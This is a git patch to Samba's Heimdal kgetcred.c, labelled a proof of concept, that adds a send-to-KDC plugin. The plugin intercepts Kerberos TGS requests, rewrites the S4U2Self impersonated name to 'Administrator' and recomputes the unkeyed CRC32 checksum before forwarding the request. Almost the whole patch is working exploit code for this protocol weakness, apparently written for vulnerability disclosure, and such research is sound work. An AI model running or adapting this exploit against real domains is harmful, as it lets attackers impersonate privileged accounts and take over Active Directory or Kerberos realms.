From 9177b748bfba6408017a1a14fb06cc5202902c18 Mon Sep 17 00:00:00 2001
From: Isaac Boukris <iboukris@gmail.com>
Date: Wed, 14 Nov 2018 03:15:22 +0200
Subject: [PATCH] poc: unkeyed s4u2self checksum overwritten on wire

Signed-off-by: Isaac Boukris <iboukris@gmail.com>
---
 source4/heimdal/kuser/kgetcred.c | 119 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 119 insertions(+)

diff --git a/source4/heimdal/kuser/kgetcred.c b/source4/heimdal/kuser/kgetcred.c
index b95bc9d05e2..f92e1e5e3c2 100644
--- a/source4/heimdal/kuser/kgetcred.c
+++ b/source4/heimdal/kuser/kgetcred.c
@@ -31,6 +31,10 @@
  * SUCH DAMAGE.
  */
 
+#include <send_to_kdc_plugin.h>
+
+#include "krb5_locl.h"
+
 #include "kuser_locl.h"
 
 static char *cache_str;
@@ -91,6 +95,116 @@ usage(int ret)
     exit (ret);
 }
 
+static krb5_error_code
+plugin_init(krb5_context context, void **pctx)
+{
+    *pctx = NULL;
+    return 0;
+}
+
+static void
+plugin_fini(void *ctx)
+{
+}
+
+static krb5_error_code
+plugin_send_to_kdc(krb5_context context,
+		   void *ctx,
+		   krb5_krbhst_info *ho,
+		   time_t timeout,
+		   const krb5_data *in,
+		   krb5_data *out)
+{
+    return KRB5_PLUGIN_NO_HANDLE;
+}
+
+static krb5_error_code
+my_plugin_send_to_realm(krb5_context context,
+                     void *ctx,
+                     krb5_const_realm realm,
+                     time_t timeout,
+                     const krb5_data *in,
+                     krb5_data *out)
+{
+	krb5_error_code ret;
+	KDC_REQ req;
+	const PA_DATA *sdata;
+	size_t used;
+	krb5_data mod_buf;
+	krb5_crypto crypto;
+	krb5_data data;
+	PA_S4U2Self self;
+	const char *str;
+	krb5_principal mod_princ;
+	int i = 0;
+
+	static bool off = false;
+
+        if(off)
+            return KRB5_PLUGIN_NO_HANDLE;
+
+        ret = decode_TGS_REQ(in->data, in->length, &req, &used);
+
+	if (ret)
+	    return KRB5_PLUGIN_NO_HANDLE;
+
+	sdata = krb5_find_padata(req.padata->val, req.padata->len,
+				 KRB5_PADATA_FOR_USER, &i);
+	if (sdata == NULL)
+	    return KRB5_PLUGIN_NO_HANDLE;
+
+	ret = decode_PA_S4U2Self(sdata->padata_value.data,
+				 sdata->padata_value.length,
+				 &self, NULL);
+	if (ret)
+	    return ret;
+
+	ret = krb5_parse_name(context, "Administrator", &mod_princ);
+	if (ret)
+	    return ret;
+
+	self.name = mod_princ->name;
+
+	ret = _krb5_s4u2self_to_checksumdata(context, &self, &data);
+	if (ret)
+	    return ret;
+
+	ret = krb5_create_checksum(context,
+				   NULL,
+				   KRB5_KU_OTHER_CKSUM,
+				   CKSUMTYPE_CRC32,
+				   data.data,
+				   data.length,
+				   &self.cksum);
+
+	ASN1_MALLOC_ENCODE(PA_S4U2Self, req.padata->val[i].padata_value.data,
+			   req.padata->val[i].padata_value.length, &self, &used, ret);
+	if (ret)
+	    return ret;
+
+	ASN1_MALLOC_ENCODE(TGS_REQ, mod_buf.data, mod_buf.length, &req, &used, ret);
+	if (ret)
+	    return ret;
+
+        off = true;
+
+        ret = krb5_sendto_kdc(context, &mod_buf, &realm, out);
+        if (ret)
+                krb5_err(context, 1, ret, "krb5_sendto_kdc");
+
+        off = false;
+
+        return 0;
+}
+
+static krb5plugin_send_to_kdc_ftable my_plugin_ftable = {
+       KRB5_PLUGIN_SEND_TO_KDC_VERSION_2,
+       plugin_init,
+       plugin_fini,
+       plugin_send_to_kdc,
+       my_plugin_send_to_realm
+};
+
 int
 main(int argc, char **argv)
 {
@@ -160,6 +274,11 @@ main(int argc, char **argv)
 	    krb5_err(context, 1, ret, "krb5_parse_name %s", impersonate_str);
 	krb5_get_creds_opt_set_impersonate(context, opt, impersonate);
 	krb5_get_creds_opt_add_options(context, opt, KRB5_GC_NO_STORE);
+
+	ret = krb5_plugin_register(context, PLUGIN_TYPE_DATA, KRB5_PLUGIN_SEND_TO_KDC, &my_plugin_ftable);
+	if (ret)
+	    krb5_err(context, 1, ret, "krb5_plugin_register");
+
         krb5_free_principal(context, impersonate);
     }
 
-- 
2.14.4